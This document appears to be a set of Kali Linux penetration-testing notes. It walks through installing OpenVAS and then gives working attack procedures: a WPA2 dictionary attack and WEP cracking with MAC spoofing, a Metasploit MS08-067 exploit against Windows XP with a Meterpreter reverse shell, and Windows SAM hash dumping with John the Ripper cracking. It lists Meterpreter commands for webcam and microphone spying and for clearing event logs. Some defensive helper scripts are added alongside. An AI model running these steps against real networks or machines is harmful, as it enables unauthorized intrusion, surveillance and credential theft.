OpenVAS is no longer included by default with Kali Linux. To set up OpenVAS, perform the following steps. First, make sure the Kali repository is available in your sources.list file:

nano /etc/apt/sources.list

And make sure the following line is present.  If it is not, add it.

deb kali-rolling main non-free contrib

You can now install OpenVAS with the following commands:

apt update

apt install openvas

openvas-setup

The openvas-setup command takes a while to complete, so do not become impatient. When it finishes, copy the password it prints into a text editor and save it. Now you need to rebuild your OpenVAS database with the following command:

openvasmd --rebuild

This command will also take a while to complete. Once it completes, you can access the web interface at https://localhost:9392. The username is admin and the password is the one you saved earlier.

A dictionary attack against a WPA2-protected access point is very easy using Kali Linux 2.0 and wifite:

wifite --wpa --crack --aircrack --dict /usr/share/wordlists/sqlmap.txt

I would recommend using a larger dictionary file than sqlmap.txt; several large dictionary files are available online.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.


use exploit/windows/smb/ms08_067_netapi

set RHOST <target_windows_xp_ip>

exploit # Do not execute at this point if you want to add the payload below

? or help # See the list of available Meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> # The default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 # 4444 assumes the default local port
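As an added defender-side check (this is not part of the original notes), the same netstat verification can be scripted. The Python below parses `netstat -an` output, in either the Windows layout or the Linux layout, and lists established connections that involve a given port, so an outbound session to a listener on 4444 shows up even when the port is not the local one. The sample netstat output embedded in the block is constructed for the example.

```python
import re

# Constructed sample: what `netstat -an` prints on a Windows XP host that has
# an open Meterpreter session back to a Kali listener on the default port.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING
  TCP    192.168.56.101:1038    192.168.56.1:4444      ESTABLISHED
  UDP    0.0.0.0:445            *:*
""".splitlines()

# host:port token; the host part may itself contain colons (IPv6).
ADDR_RE = re.compile(r"^(\S+):(\d+)$")


def parse_netstat_line(line):
    """Return (proto, lhost, lport, rhost, rport, state) for a socket line,
    or None for headers and lines without two endpoints (e.g. UDP "*:*").
    Works for the Windows layout above and for Linux `netstat -an` lines,
    which both carry two host:port tokens followed by an upper-case state."""
    tokens = line.split()
    if not tokens or tokens[0].upper() not in ("TCP", "UDP", "TCP6", "UDP6"):
        return None
    endpoints = []
    for tok in tokens[1:]:
        m = ADDR_RE.match(tok)
        if m:
            endpoints.append((m.group(1), int(m.group(2))))
    if len(endpoints) < 2:
        return None
    (lhost, lport), (rhost, rport) = endpoints[0], endpoints[1]
    last = tokens[-1]
    state = last if last.isupper() and not ADDR_RE.match(last) else ""
    return (tokens[0].upper(), lhost, lport, rhost, rport, state)


def sessions_on_port(lines, port):
    """Established connections where either endpoint uses `port`."""
    hits = []
    for line in lines:
        parsed = parse_netstat_line(line)
        if parsed is None:
            continue
        proto, lhost, lport, rhost, rport, state = parsed
        if state == "ESTABLISHED" and port in (lport, rport):
            hits.append((proto, f"{lhost}:{lport}", f"{rhost}:{rport}"))
    return hits


if __name__ == "__main__":
    for proto, local, remote in sessions_on_port(SAMPLE_NETSTAT, 4444):
        print(f"{proto} {local} -> {remote} ESTABLISHED")
```

On a real host, feed it the live output (for example `subprocess.run(["netstat", "-an"], capture_output=True, text=True).stdout.splitlines()`) instead of the constructed sample.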

Some interesting Meterpreter commands are:

hashdump # get password hashes to crack
record_mic # record audio
webcam_list # list available webcams
webcam_snap # take a picture with the webcam
webcam_stream # stream video from the webcam
sysinfo # get remote system information
shutdown # turn off the remote computer
reboot # reboot the remote computer
ps # list processes running on the remote computer
kill <pid> # end a process running on the remote computer
execute -f <file> # start a program on the remote machine
clearev # clear the event log
upload <file> # send a file to the remote system
download <file> # retrieve a file from the remote system

Cracking WEP in Kali Linux 2.0 has become extremely easy. Open WiFite from the Applications menu and at the prompt type:

wifite --wep

Follow the onscreen instructions and the work is done for you.


WEP cracking instructions for Kali Linux 1.0

>>>Open a new terminal window


# Will show you a list of your available wireless interfaces
# Note the name of your wireless interface, normally wlan0 or mon0

airmon-ng stop wlan0

# Stops the airmon-ng daemon

ifconfig wlan0 down

# stops the wireless interface

macchanger --mac 00:11:22:33:44:55 wlan0

# Spoofs your MAC address to hide your identity

airmon-ng start wlan0

# Starts the airmon-ng daemon

airodump-ng wlan0

# Locate available wireless access points to attack
# For our lab, look for WEPDEmo and note its BSSID (MAC) and channel

airodump-ng -c 6 -w wepdemoattack --bssid 20:AA:4B:8B:A4:6E wlan0

# Start monitoring WEPDEmo for associations to attempt to crack
# -c 6 specifies the channel
# -w wepdemoattack specifies the name of the file to save as
# --bssid 20:AA:4B:8B:A4:6E is the MAC of the access point you are attacking
# wlan0 is the wireless card you are monitoring with

>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Attempt to associate with the wireless access point
# -1 0: the 1 specifies the type of attack (fake authentication) and the 0 is the delay
# -a is the MAC of the access point being attacked
# -h is the spoofed MAC of our system
# -e is the access point's SSID
# wlan0 is the interface we are attacking with

aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0

# Will send traffic to the access point and monitor

aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap

# Will attempt to crack the WEP key from the traffic captured so far
# Will check as you run it and then every 5000 IVs (listed as #Data on the airodump terminal)

>>>>Open a new terminal window

aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0

# Repeatedly run this to generate more traffic and speed up the attack

Eventually on the aircrack-ng screen you should see the correct WEP key:

26:27:F6:85:97 for my demo
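The procedure above works because of how WEP uses RC4, and the following Python is an added illustration of that (it is not part of the original notes and recovers no key). WEP forms each frame's RC4 key as a 24-bit IV, sent in the clear, followed by the shared key, so once an IV repeats the keystream repeats, and the XOR of two such ciphertexts is the XOR of their plaintexts. The block also computes the birthday-bound chance of an IV repeat, which is why the #Data counter in airodump-ng matters. The RC4 implementation, the frame contents and the 40-bit key are constructed for the example; the real attacks go further by exploiting weak IVs, which this block does not do.

```python
import math
import os


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA + PRGA); enough to show the keystream-reuse property."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, shared_key: bytes, plaintext: bytes) -> bytes:
    """WEP-style framing: per-frame RC4 key = IV || shared key (ICV/CRC omitted)."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def recover_other_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so c1 ^ c2 == p1 ^ p2
    and knowing p1 yields p2 without ever learning the shared key."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday-bound probability that at least one IV repeats among `frames`
    frames when IVs are drawn uniformly at random from 2**iv_bits values."""
    space = 2 ** iv_bits
    log_no_collision = sum(math.log1p(-i / space) for i in range(frames))
    return 1.0 - math.exp(log_no_collision)


if __name__ == "__main__":
    key = os.urandom(5)                        # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"                       # the IV travels in the clear
    p1 = b"frame one, known plaintext"         # constructed frame contents
    p2 = b"frame two, secret content!"
    c1, c2 = wep_encrypt(iv, key, p1), wep_encrypt(iv, key, p2)
    print("IV reuse leaks the second frame:", recover_other_plaintext(c1, c2, p1))
    print("P(repeated IV after 5000 frames) =", round(iv_collision_probability(5000), 3))
```

The 5000-frame figure is the same order as the "every 5000 IVs" check interval above: with only 2^24 possible IVs, a busy network reuses one with better than even odds after a few thousand frames, which is the property WPA2's per-frame nonces were designed to remove.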



It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Boot the target Windows computer from your Kali Linux 2.0 system. From time to time, when you try to access the hard drive containing the Windows partition, you may receive an error message related to the Windows hibernation file. To avoid this, shut down Windows from the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem. Once you are in Kali, open Files and select your Windows hard drive to mount it. Open a terminal window and enter the command

mount

to determine the path to your Windows hard drive. Most of the time the Windows hard drive will be the last mount point in the list, normally something like /dev/sda1, and its path will be something like /media/root/OSDisk. Browse to the Windows/System32/config folder under your mount point. Use the following command to create a dump of the Windows password hashes:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 --format=NT


For Kali Linux prior to version 2.0

Open a terminal
Open the drive in Computer so it will mount
Run mount to see the location of the drive
Change to the /Windows/System32/config folder in the mount point

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt --format=nt2
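Both the pwdump route (Kali 2.0) and the bkhive/samdump2 route (Kali 1.x) above produce the same `user:rid:LM:NT:::` lines that john consumes. As an added audit helper (not part of the original notes), the Python below parses that format and reports what makes such a dump cheap to crack: accounts with an empty password, accounts that still store an LM hash, and accounts sharing a password, which is visible directly because NT hashes are unsalted. The sample dump is constructed; the two empty-password hash values are public constants.

```python
# Public constants: hashes of the empty password in the LM and NT schemes.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump in pwdump/samdump2 format (hash values other than
# the empty-password constants are arbitrary hex, not real password hashes).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
""".splitlines()


def parse_pwdump(lines):
    """Parse `user:rid:LM:NT:::` lines into dicts; skips blanks, comments and
    malformed lines. Hashes are lower-cased so comparisons are exact."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return records


def lm_hash_stored(lm):
    """True when a real LM hash is present. Some dump tools print the literal
    'NO PASSWORD*********************' instead of the empty-LM constant."""
    return lm not in ("", EMPTY_LM) and not lm.startswith("no password")


def audit(records):
    """Return (account, finding) pairs in a stable order: per-account findings
    first, then shared-password groups."""
    findings = []
    by_nt = {}
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "empty password"))
        if lm_hash_stored(r["lm"]):
            findings.append((r["user"], "LM hash stored"))
        if r["nt"] != EMPTY_NT:
            by_nt.setdefault(r["nt"], []).append(r["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(users), "shared password (identical NT hash)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{account}: {finding}")
```

Point it at the file the notes create (`parse_pwdump(open("/root/Desktop/SAM2").read().splitlines())`) to see which accounts john will finish first; the "LM hash stored" finding is the one to fix on the Windows side, since LM is the format that falls without a dictionary at all.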